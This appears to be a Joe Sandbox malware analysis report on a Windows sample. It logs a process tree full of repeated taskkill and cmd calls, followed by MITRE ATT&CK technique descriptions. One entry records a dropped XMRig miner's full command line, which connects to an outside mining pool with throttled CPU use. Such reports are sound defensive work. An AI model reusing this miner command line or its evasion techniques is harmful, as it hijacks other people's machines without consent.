Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	10:39:02
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\ProgramData\syabcd.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Imagebase:	0x7ff66fae0000
File size:	1'361'920 bytes
MD5 hash:	23D84A7ED2E8E76D0A13197B74913654
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	10:39:03
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	137
Start time:	10:39:04
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	141
Start time:	10:39:05
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	151
Start time:	10:39:05
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	158
Start time:	10:39:05
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	172
Start time:	10:39:05
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	233
Start time:	10:39:07
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	238
Start time:	10:39:08
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	243
Start time:	10:39:08
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	272
Start time:	10:39:09
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	282
Start time:	10:39:09
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	307
Start time:	10:39:10
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	313
Start time:	10:39:10
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	355
Start time:	10:39:12
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	375
Start time:	10:39:12
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	380
Start time:	10:39:12
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	385
Start time:	10:39:13
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	423
Start time:	10:39:14
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	456
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	457
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	472
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	475
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	476
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	478
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	479
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	483
Start time:	10:39:15
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	544
Start time:	10:39:17
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	592
Start time:	10:39:18
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	599
Start time:	10:39:18
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	685
Start time:	10:39:21
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	690
Start time:	10:39:22
Start date:	14/06/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report x00zm3KVwb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Bitcoin Miner

Compliance

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

